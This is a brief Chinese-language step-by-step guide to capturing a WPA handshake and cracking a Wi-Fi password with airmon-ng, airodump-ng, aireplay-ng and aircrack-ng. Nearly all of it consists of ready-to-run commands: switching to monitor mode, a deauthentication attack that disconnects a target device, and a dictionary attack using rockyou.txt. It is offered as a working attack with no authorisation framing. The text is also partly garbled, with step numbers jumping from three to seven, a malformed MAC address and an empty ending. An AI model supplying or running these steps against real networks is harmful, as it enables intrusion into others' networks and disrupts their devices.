第一步:進入Monitor 模式
airmon-ng #查看當前使用無線網卡
airmon-ng check #查看可能影響無線掃描的進程
airmon-ng check kill #關閉有可能影響無線掃描的進程
airmon-ng start wlan0 #使用wlan0 進入Monitor模式
使用 iwconfig 命令 查看 wlanmon的 Mode項是否切換爲Monitor模式
第二步:啓動抓包並保存數據包
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa #--bssid 監聽指定MAC的設備 -c 是指定信道 -w 把監聽的數據包寫入文件
第三步:Deauthentication 抓取XOR文件(有無線設備已經連接上路由器)
發送解除數據包打斷現在與AP(路由器)連接的設備(手機,筆記本等),讓設備再次重新連接
aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon# -0打斷指令 1 進行一次嘗試 -a 路由器的mac -c要斷開的無線設備MAC地址 wlan0mon 使用的無線網卡
出現 handshake說明成功獲取四次握手信息:
第七步:使用密碼字典進行攻擊(可用kali自帶,也可用網上下載或者自己組合生成的字典)
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap # -w 使用的字典
/usr/share/wordlist 裏面有一個比較大的字典(一千多萬個密碼):rockyou.txt.gz,可解壓後用
最後得出密碼: